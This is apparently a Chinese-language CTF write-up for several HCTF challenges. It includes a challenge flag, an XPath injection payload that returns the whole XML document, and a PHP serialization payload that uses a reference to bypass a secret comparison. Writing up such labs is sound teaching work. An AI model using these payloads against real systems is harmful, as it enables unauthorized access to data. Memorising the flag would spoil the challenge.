new hctf writeup - 0

平台更新了,出了几题新题,哎~~没学过汇编,最简单的PWN都不会…只会WEB,,哎,,沦为WEB狗了

哎,一个一血也没有,。。。。

0x0 Firest-Step | POINT : 10

题目描述 : 新平台的第一题,但愿不要出现什么bug。有bug及时报告啊~作为奖励,赏你们个flag。upgs{J31pbz3-g0-uqh1fn-p7s}

今年BCTF的第一题,就如HINT写的那样,不需要什么hint,很简单的。起的迟,一血被AK拿了~_~/

0x1 另类的注入 | POINT : 100

题目描述 : 上次各种SQL注入你们是不是都疯了,我们换一个注入玩玩。

这题是XPATH injection。。。没学过XPATH,然后就百度,学学呗,然后盲注出 admin 的 password ,然后并没有什么用。。。

最后回过头来看最开始给的那个XPATH注入的博文 : http://blog.csdn.net/yefan2222/article/details/7227932

参考这篇博文中的payload,构造出以下payload :

  • lightless’] | //*| //*[‘

Get Flag !

0x2 PHPの黑魔法?!| POINT : 300

题目描述 : 这个题我也不会做,做出来的老司机教教我!

写了这么久的PHP,做完这题后,我才知道,PHP竟然有指针!(世界上最好的语言需要指针?)。

这题是出自 ‘php4fun challenge 6’

解法一 : 把上面引号里的拿去Google,可以找到正解。
PS:WooYun里这题的解法是错误的,而百度上能找到的基本都是来源于WooYun….反正我是没能百度到

解法二 : 参考WooYun错误的解法,做了一个修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
//WooYun错误解法
class just4fun {
var $enter;
var $secret;
}

$a=new just4fun();
$a->enter='?????????????????????????????';
echo urlencode(serialize($a));

//修改后,我的解法
class lightless {
var $enter;
var $secret;
}

$a=new lightless();
$a->secret = 'a';
$a->enter= &$a->secret; //真是第一次知道PHP竟然有指针
echo urlencode(serialize($a));

参考文献 -> 自行Google -> ‘php serialize 格式详解’

Get Flag !